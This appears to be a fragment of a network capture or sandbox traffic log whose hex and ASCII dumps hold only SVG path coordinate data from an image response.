                                                                                                                                                                                                                                                  Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4725INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                  Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4741INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4757INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4773INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                  Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4816INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4832INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                  Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4848INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4864INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                  Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4880INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4896INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                  Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4912INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4928INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                  Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4944INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4960INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                  Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4976INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                  Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC4992INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5008INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
